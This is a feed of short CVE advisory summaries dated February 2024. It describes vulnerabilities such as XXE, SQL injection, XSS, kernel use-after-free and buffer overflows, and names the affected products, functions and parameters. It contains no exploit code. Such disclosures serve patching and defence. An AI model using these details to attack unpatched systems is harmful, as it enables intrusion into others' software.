🚨 CVE-2023-4554Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows, Linux allows Server Side Request Forgery, Probe System Files.AppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery, disclose files local to the server that processes them.This issue affects AppBuilder: from 21.2 before 23.2.🎖@cveNotify |
|
| 2024-02-05 21:37:24 |
🚨 CVE-2023-40549An out-of-bounds read flaw was found in Shim due to the lack of proper boundary verification during the load of a PE binary. This flaw allows an attacker to load a crafted PE binary, triggering the issue and crashing Shim, resulting in a denial of service.🎖@cveNotify |
|
| 2024-02-05 21:07:40 |
🚨 CVE-2024-0836The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.🎖@cveNotify |
|
| 2024-02-05 21:07:33 |
🚨 CVE-2024-1036A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311.🎖@cveNotify |
|
| 2024-02-05 21:07:32 |
🚨 CVE-2024-24565CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.🎖@cveNotify |
|
| 2024-02-05 21:07:28 |
🚨 CVE-2023-46231In Splunk Add-on Builder versions below 4.1.4, the application writes user session tokens to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.🎖@cveNotify |
|
| 2024-02-05 21:07:27 |
🚨 CVE-2024-1030A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.🎖@cveNotify |
|
| 2024-02-05 20:37:32 |
🚨 CVE-2024-22202phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. phpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account. The front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control. This issue has been patched in version 3.2.5.🎖@cveNotify |
|
| 2024-02-05 20:37:25 |
🚨 CVE-2024-1021A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-05 20:37:24 |
🚨 CVE-2015-3290arch/x86/entry/entry_64.S in the Linux kernel before 4.1.6 on the x86_64 platform improperly relies on espfix64 during nested NMI processing, which allows local users to gain privileges by triggering an NMI within a certain instruction window.🎖@cveNotify |
|
| 2024-02-05 20:07:31 |
🚨 CVE-2023-40546A flaw was found in Shim when an error happened while creating a new ESL variable. If Shim fails to create the new variable, it tries to print an error message to the user; however, the number of parameters used by the logging function doesn't match the format string used by it, leading to a crash under certain circumstances.🎖@cveNotify |
|
| 2024-02-05 20:07:26 |
🚨 CVE-2017-15126A use-after-free flaw was found in fs/userfaultfd.c in the Linux kernel before 4.13.6. The issue is related to the handling of fork failure when dealing with event messages. Failure to fork correctly can lead to a situation where a fork event will be removed from an already freed list of events with userfaultfd_ctx_put().🎖@cveNotify |
|
| 2024-02-05 20:07:25 |
🚨 CVE-2005-0246The intagg contrib module for PostgreSQL 8.0.0 and earlier allows attackers to cause a denial of service (crash) via crafted arrays.🎖@cveNotify |
|
| 2024-02-05 19:37:32 |
🚨 CVE-2024-24396Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.🎖@cveNotify |
|
| 2024-02-05 19:37:25 |
🚨 CVE-2023-47158IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1 and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750.🎖@cveNotify |
|
| 2024-02-05 19:37:24 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-02-05 19:07:33 |
🚨 CVE-2024-22523Directory Traversal vulnerability in Qiyu iFair version 23.8_ad0 and before, allows remote attackers to obtain sensitive information via uploadimage component.🎖@cveNotify |
|
| 2024-02-05 19:07:27 |
🚨 CVE-2023-51843react-dashboard 1.4.0 is vulnerable to Cross Site Scripting (XSS) as httpOnly is not set.🎖@cveNotify |
|
| 2024-02-05 19:07:26 |
🚨 CVE-2024-23441Vba32 Antivirus v3.36.0 is vulnerable to a Denial of Service vulnerability by triggering the 0x2220A7 IOCTL code of the Vba32m64.sys driver.🎖@cveNotify |
|
| 2024-02-05 19:07:25 |
🚨 CVE-2023-20246Multiple Cisco products are affected by a vulnerability in Snort access control policies that could allow an unauthenticated, remote attacker to bypass the configured policies on an affected system. This vulnerability is due to a logic error that occurs when the access control policies are being populated. An attacker could exploit this vulnerability by establishing a connection to an affected device. A successful exploit could allow the attacker to bypass configured access control rules on the affected system.🎖@cveNotify |
|
| 2024-02-05 18:07:25 |
🚨 CVE-2023-51886Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using \convertpath.🎖@cveNotify |
|
| 2024-02-05 18:07:24 |
🚨 CVE-2023-51885Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component.🎖@cveNotify |
|
| 2024-02-05 17:37:32 |
🚨 CVE-2023-36085The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources.🎖@cveNotify |
|
| 2024-02-05 17:37:26 |
🚨 CVE-2023-43261An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.🎖@cveNotify |
|
| 2024-02-05 17:37:25 |
🚨 CVE-2023-0099The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2024-02-05 17:37:24 |
🚨 CVE-2021-3882LedgerSMB does not set the 'Secure' attribute on the session authorization cookie when the client uses HTTPS and the LedgerSMB server is behind a reverse proxy. By tricking a user to use an unencrypted connection (HTTP), an attacker may be able to obtain the authentication data by capturing network traffic. LedgerSMB 1.8 and newer switched from Basic authentication to using cookie authentication with encrypted cookies. Although an attacker can't access the information inside the cookie, nor the password of the user, possession of the cookie is enough to access the application as the user from which the cookie has been obtained. In order for the attacker to obtain the cookie, first of all the server must be configured to respond to unencrypted requests, the attacker must be suitably positioned to eavesdrop on the network traffic between the client and the server *and* the user must be tricked into using unencrypted HTTP traffic. Proper audit control and separation of duties limit Integrity impact of the attack vector. Users of LedgerSMB 1.8 are urged to upgrade to known-fixed versions. Users of LedgerSMB 1.7 or 1.9 are unaffected by this vulnerability and don't need to take action. As a workaround, users may configure their Apache or Nginx reverse proxy to add the Secure attribute at the network boundary instead of relying on LedgerSMB. For Apache, please refer to the 'Header always edit' configuration command in the mod_headers module. For Nginx, please refer to the 'proxy_cookie_flags' configuration command.🎖@cveNotify |
|
| 2024-02-05 17:07:27 |
🚨 CVE-2024-1009A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-05 17:07:26 |
🚨 CVE-2024-23641SvelteKit is a web development kit. In SvelteKit 2, sending a GET request with a body eg `{}` to a built and previewed/hosted sveltekit app throws `Request with GET/HEAD method cannot have body.` and crashes the preview/hosting. After this happens, one must manually restart the app. `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. `@sveltejs/adapter-node` versions 2.1.2, 3.0.3, and 4.0.1 and `@sveltejs/kit` version 2.4.3 contain a patch for this issue.🎖@cveNotify |
|
| 2024-02-05 15:37:27 |
🚨 CVE-2024-247681Panel is an open source Linux server operation and maintenance management panel. The HTTPS cookie that comes with the panel does not have the Secure keyword, which may cause the cookie to be sent in plain text if accessed using HTTP. This issue has been patched in version 1.9.6.🎖@cveNotify |
|
| 2024-02-05 15:37:26 |
🚨 CVE-2023-52138Engrampa is an archive manager for the MATE environment. Engrampa is found to be vulnerable to a Path Traversal vulnerability that can be leveraged to achieve full Remote Command Execution (RCE) on the target. While handling CPIO archives, the Engrampa Archive manager follows symlink, cpio by default will follow stored symlinks while extracting and the Archiver will not check the symlink location, which leads to arbitrary file writes to unintended locations. When the victim extracts the archive, the attacker can craft a malicious cpio or ISO archive to achieve RCE on the target system. This vulnerability was fixed in commit 63d5dfa.🎖@cveNotify |
|
| 2024-02-05 15:37:25 |
🚨 CVE-2024-23388Improper authorization in handler for custom URL scheme issue in "Mercari" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2024-02-05 14:37:26 |
🚨 CVE-2024-23109An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.🎖@cveNotify |
|
| 2024-02-05 14:37:25 |
🚨 CVE-2023-51889Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL.🎖@cveNotify |
|
| 2024-02-05 14:37:24 |
🚨 CVE-2023-51888Buffer Overflow vulnerability in the nomath() function in Mathtex v.1.05 and before allows a remote attacker to cause a denial of service via a crafted string in the application URL.🎖@cveNotify |
|
| 2024-02-05 14:07:33 |
🚨 CVE-2024-20002In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.🎖@cveNotify |
|
| 2024-02-05 14:07:26 |
🚨 CVE-2023-5800Vintage,member of the AXIS OS Bug Bounty Program, has found that the VAPIX API create_overlay.cgidid not have a sufficient input validation allowing for a possible remote codeexecution. This flaw can only be exploited after authenticating with anoperator- or administrator-privileged service account. Axis has released patched AXIS OSversions for the highlighted flaw. Please refer to the Axis security advisoryfor more information and solution.🎖@cveNotify |
|
| 2024-02-05 14:07:25 |
🚨 CVE-2023-51504Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.🎖@cveNotify |
|
| 2024-02-05 14:07:24 |
🚨 CVE-2023-51890An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attackers to consume CPU resources via crafted string in the application URL.🎖@cveNotify |
|
| 2024-02-05 13:37:24 |
🚨 CVE-2024-1225A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-05 10:37:25 |
🚨 CVE-2023-5643Out-of-bounds Write vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations. Depending on the configuration of the Mali GPU Kernel Driver, and if the system’s memory is carefully prepared by the user, then this in turn could write to memory outside of buffer bounds.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r45p0; Valhall GPU Kernel Driver: from r41p0 through r45p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r45p0.🎖@cveNotify |
|
| 2024-02-05 10:37:24 |
🚨 CVE-2023-5249Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper memory processing operations to exploit a software race condition. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Bifrost GPU Kernel Driver: from r35p0 through r40p0; Valhall GPU Kernel Driver: from r35p0 through r40p0.🎖@cveNotify |
|
| 2024-02-05 09:37:24 |
🚨 CVE-2021-4436The 3DPrint Lite WordPress plugin before 1.9.1.5 does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.🎖@cveNotify |
|
| 2024-02-05 08:37:35 |
🚨 CVE-2024-24864A race condition was found in the Linux kernel's media/dvb-core in dvbdmx_write() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.🎖@cveNotify |
|
| 2024-02-05 08:37:32 |
🚨 CVE-2024-24861A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.🎖@cveNotify |
|
| 2024-02-05 08:37:31 |
🚨 CVE-2024-24859A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.🎖@cveNotify |
|
| 2024-02-05 08:37:30 |
🚨 CVE-2024-24857A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.🎖@cveNotify |
|
| 2024-02-05 08:37:26 |
🚨 CVE-2024-22667Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.🎖@cveNotify |
|
| 2024-02-05 08:37:25 |
🚨 CVE-2024-22386A race condition was found in the Linux kernel's drm/exynos device driver in exynos_drm_crtc_atomic_disable() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.🎖@cveNotify |
|
| 2024-02-05 08:37:24 |
🚨 CVE-2023-24676An issue found in ProcessWire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module. NOTE: this is disputed because exploitation requires that the attacker is able to enter requests as an admin; however, a ProcessWire admin is intentionally allowed to install any module that contains any arbitrary code.🎖@cveNotify |
|
| 2024-02-05 07:37:35 |
🚨 CVE-2024-24848Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS.This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-02-05 07:37:31 |
🚨 CVE-2024-24847Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgadbois CalculatorPro Calculators allows Reflected XSS.This issue affects CalculatorPro Calculators: from n/a through 1.1.7.🎖@cveNotify |
|
| 2024-02-05 07:37:30 |
🚨 CVE-2024-24839Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-02-05 07:37:29 |
🚨 CVE-2024-24838Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS.This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-02-05 07:37:26 |
🚨 CVE-2023-7077Sharp NEC Displays (P403, P463, P553, P703, P801, X554UN, X464UN, X554UNS, X464UNV, X474HB, X464UNS, X554UNV, X555UNS, X555UNV, X754HB, X554HB, E705, E805, E905, UN551S, UN551VS, X551UHD, X651UHD, X841UHD, X981UHD, MD551C8) allows an attacker execute remote code by sending unintended parameters in http request.🎖@cveNotify |
|
| 2024-02-05 07:37:25 |
🚨 CVE-2023-6111A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The function nft_trans_gc_catchall did not remove the catchall set element from the catchall_list when the argument sync is true, making it possible to free a catchall set element many times.We recommend upgrading past commit 93995bf4af2c5a99e2a87f0cd5ce547d31eb7630.🎖@cveNotify |
|
| 2024-02-05 07:37:24 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2024-02-05 06:37:41 |
🚨 CVE-2024-24866Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Reflected XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.🎖@cveNotify |
|
| 2024-02-05 06:37:40 |
🚨 CVE-2024-20016In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation Patch ID: ALPS07835901; Issue ID: ALPS07835901.🎖@cveNotify |
|
| 2024-02-05 06:37:36 |
🚨 CVE-2024-20012In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358566; Issue ID: ALPS08358566.🎖@cveNotify |
|
| 2024-02-05 06:37:35 |
🚨 CVE-2024-20010In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358560; Issue ID: ALPS08358560.🎖@cveNotify |
|
| 2024-02-05 06:37:31 |
🚨 CVE-2024-20007In mp3 decoder, there is a possible out of bounds write due to a race condition. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441369; Issue ID: ALPS08441369.🎖@cveNotify |
|
| 2024-02-05 06:37:30 |
🚨 CVE-2024-20004In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01195812 (MSV-985).🎖@cveNotify |
|
| 2024-02-05 06:37:29 |
🚨 CVE-2024-20003In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01191612 (MSV-981).🎖@cveNotify |
|
| 2024-02-05 06:37:26 |
🚨 CVE-2024-20002In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.🎖@cveNotify |
|
| 2024-02-05 06:37:25 |
🚨 CVE-2023-5677BrandonRothel from QED Secure Solutions has found that the VAPIX API tcptest.cgidid not have a sufficient input validation allowing for a possible remote codeexecution. This flaw can only be exploited after authenticating with anoperator- or administrator-privileged service account. The impact of exploitingthis vulnerability is lower with operator-privileges compared toadministrator-privileges service accounts. Axis has released patched AXIS OSversions for the highlighted flaw. Please refer to the Axis security advisoryfor more information and solution.🎖@cveNotify |
|
| 2024-02-05 06:37:24 |
🚨 CVE-2023-51504Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.🎖@cveNotify |
|
| 2024-02-05 04:37:25 |
🚨 CVE-2024-1059Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-02-05 04:37:24 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-02-05 03:37:25 |
🚨 CVE-2023-52339In libebml before 1.4.5, an integer overflow in MemIOCallback.cpp can occur when reading or writing. It may result in buffer overflows.🎖@cveNotify |
|
| 2024-02-05 03:37:24 |
🚨 CVE-2022-40896A ReDoS issue was discovered in pygments/lexers/smithy.py in pygments through 2.15.0 via SmithyLexer.🎖@cveNotify |
|
| 2024-02-05 02:37:32 |
🚨 CVE-2024-1194A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-05 02:37:26 |
🚨 CVE-2024-1193A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Conecction Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-05 02:37:25 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-02-05 02:37:24 |
🚨 CVE-2023-52339In libebml before 1.4.5, an integer overflow in MemIOCallback.cpp can occur when reading or writing. It may result in buffer overflows.🎖@cveNotify |
|
| 2024-02-04 22:37:24 |
🚨 CVE-2024-25089Malwarebytes Binisoft Windows Firewall Control before 6.9.9.2 allows remote attackers to execute arbitrary code via gRPC named pipes.🎖@cveNotify |
|
| 2024-02-04 21:37:25 |
🚨 CVE-2021-46903An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. An admin can delete required user accounts (in violation of expected access control).🎖@cveNotify |
|
| 2024-02-04 21:37:24 |
🚨 CVE-2021-46902An issue was discovered in LTOS-Web-Interface in Meinberg LANTIME-Firmware before 6.24.029 MBGID-9343 and 7 before 7.04.008 MBGID-6303. Path validation is mishandled, and thus an admin can read or delete files in violation of expected access controls.🎖@cveNotify |
|
| 2024-02-04 20:37:32 |
🚨 CVE-2023-6291A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.🎖@cveNotify |
|
| 2024-02-04 20:37:25 |
🚨 CVE-2023-6944A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.🎖@cveNotify |
|
| 2024-02-04 20:37:24 |
🚨 CVE-2023-7192A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow.🎖@cveNotify |
|
| 2024-02-04 18:37:24 |
🚨 CVE-2020-36773Artifex Ghostscript before 9.53.0 has an out-of-bounds write and use-after-free in devices/vector/gdevtxtw.c (for txtwrite) because a single character code in a PDF document can map to more than one Unicode code point (e.g., for a ligature).🎖@cveNotify |
|
| 2024-02-04 17:37:24 |
🚨 CVE-2018-25098** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in blockmason credit-protocol. It has been declared as problematic. Affected by this vulnerability is the function executeUcacTx of the file contracts/CreditProtocol.sol of the component UCAC Handler. The manipulation leads to denial of service. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 082e01f18707ef995e80ebe97fcedb229a55efc5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252799. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-02-04 16:37:24 |
🚨 CVE-2024-25062An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.🎖@cveNotify |
|
| 2024-02-04 14:37:24 |
🚨 CVE-2023-6240A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.🎖@cveNotify |
|
| 2024-02-04 11:37:25 |
🚨 CVE-2022-26496In nbd-server in nbd before 3.24, there is a stack-based buffer overflow. An attacker can cause a buffer overflow in the parsing of the name field by sending a crafted NBD_OPT_INFO or NBD_OPT_GO message with an large value as the length of the name.🎖@cveNotify |
|
| 2024-02-04 11:37:24 |
🚨 CVE-2022-26495In nbd-server in nbd before 3.24, there is an integer overflow with a resultant heap-based buffer overflow. A value of 0xffffffff in the name length field will cause a zero-sized buffer to be allocated for the name, resulting in a write to a dangling pointer. This issue exists for the NBD_OPT_INFO, NBD_OPT_GO, and NBD_OPT_EXPORT_NAME messages.🎖@cveNotify |
|
| 2024-02-04 10:37:25 |
🚨 CVE-2023-6174SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-02-04 10:37:24 |
🚨 CVE-2023-5371RTPS dissector memory leak in Wireshark 4.0.0 to 4.0.8 and 3.6.0 to 3.6.16 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-02-04 09:37:32 |
🚨 CVE-2023-0215The public API function BIO_new_NDEF is a helper function used for streamingASN.1 data via a BIO. It is primarily used internally to OpenSSL to support theSMIME, CMS and PKCS7 streaming capabilities, but may also be called directly byend user applications.The function receives a BIO from the caller, prepends a new BIO_f_asn1 filterBIO onto the front of it to form a BIO chain, and then returns the new head ofthe BIO chain to the caller. Under certain conditions, for example if a CMSrecipient public key is invalid, the new filter BIO is freed and the functionreturns a NULL result indicating a failure. However, in this case, the BIO chainis not properly cleaned up and the BIO passed by the caller still retainsinternal pointers to the previously freed filter BIO. If the caller then goes onto call BIO_pop() on the BIO then a use-after-free will occur. This will mostlikely result in a crash.This scenario occurs directly in the internal function B64_write_ASN1() whichmay cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() onthe BIO. This internal function is in turn called by the public API functionsPEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.Other public API functions that may be impacted by this includei2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream andi2d_PKCS7_bio_stream.The OpenSSL cms and smime command line applications are similarly affected.🎖@cveNotify |
|
| 2024-02-04 09:37:26 |
🚨 CVE-2022-4450The function PEM_read_bio_ex() reads a PEM file from a BIO and parses anddecodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data.If the function succeeds then the "name_out", "header" and "data" arguments arepopulated with pointers to buffers containing the relevant decoded data. Thecaller is responsible for freeing those buffers. It is possible to construct aPEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()will return a failure code but will populate the header argument with a pointerto a buffer that has already been freed. If the caller also frees this bufferthen a double free will occur. This will most likely lead to a crash. Thiscould be exploited by an attacker who has the ability to supply malicious PEMfiles for parsing to achieve a denial of service attack.The functions PEM_read_bio() and PEM_read() are simple wrappers aroundPEM_read_bio_ex() and therefore these functions are also directly affected.These functions are also called indirectly by a number of other OpenSSLfunctions including PEM_X509_INFO_read_bio_ex() andSSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internaluses of these functions are not vulnerable because the caller does not free theheader argument if PEM_read_bio_ex() returns a failure code. 